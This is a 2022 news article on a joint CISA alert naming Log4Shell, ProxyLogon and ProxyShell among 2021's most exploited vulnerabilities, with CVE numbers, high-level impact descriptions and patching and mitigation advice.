Log4j, ProxyShell Among Top Exploited Vulnerabilities Last Year

April 28, 2022 - ProxyShell, Log4Shell, and ProxyLogon were among the top 15 routinely exploited vulnerabilities in 2021, the Cybersecurity and Infrastructure Security Agency (CISA) revealed. CISA released a joint alert coauthored by authorities from Australia, New Zealand, Canada, and the UK. The alert applied to all critical infrastructure sectors, including healthcare.

“U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities assess, in 2021, malicious cyber actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide,” the alert stated.

“To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities across a broad spectrum of targets.”

Three of the top 15 vulnerabilities—CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510—were also routinely exploited in 2020.

“Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors,” the alert explained.

The Log4Shell vulnerability (CVE-2021-44228), which affects Apache’s Log4j library, made headlines in 2021 and caused the cybersecurity workforce to work overtime remediating the vulnerability. Successful exploitation allows a threat actor to cause a system to execute arbitrary code by submitting a specially crafted request.

Researchers disclosed the vulnerability in late 2021, but threat actors managed to exploit it before organizations could patch it.

The alert also highlighted the prominence of a series of vulnerabilities known as ProxyLogon (CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065), which affect Microsoft Exchange email servers.

“Successful exploitation of these vulnerabilities in combination (i.e., “vulnerability chaining”) allows an unauthenticated cyber actor to execute arbitrary code on vulnerable Exchange Servers, which, in turn, enables the actor to gain persistent access to files and mailboxes on the servers, as well as to credentials stored on the servers,” the alert stated.

“Successful exploitation may additionally enable the cyber actor to compromise trust and identity in a vulnerable network.”

In addition, CISA noted the ProxyShell vulnerabilities (CVE-2021-34523, CVE-2021-34473, CVE-2021-31207), which also impact Microsoft Exchange email servers. Successful exploitation of these vulnerabilities allows threat actors to execute arbitrary code remotely.

To mitigate all vulnerabilities, CISA emphasized the urgency of patching as soon as a vulnerability is disclosed. The National Institute of Standards and Technology’s (NIST) National Cybersecurity Center of Excellence (NCCoE) recently released final guidance regarding enterprise patch management to help organization prevent vulnerabilities and exploitation within their IT systems.

Unpatched devices and systems can serve as an easy network entry point for threat actors. Medical devices in particular can be difficult to patch due to their portability and the fact that organizations may not know how many devices are on their networks at any given time.

CISA’s alert encouraged organizations to implement multifactor authentication along with network segmentation and endpoint detection systems.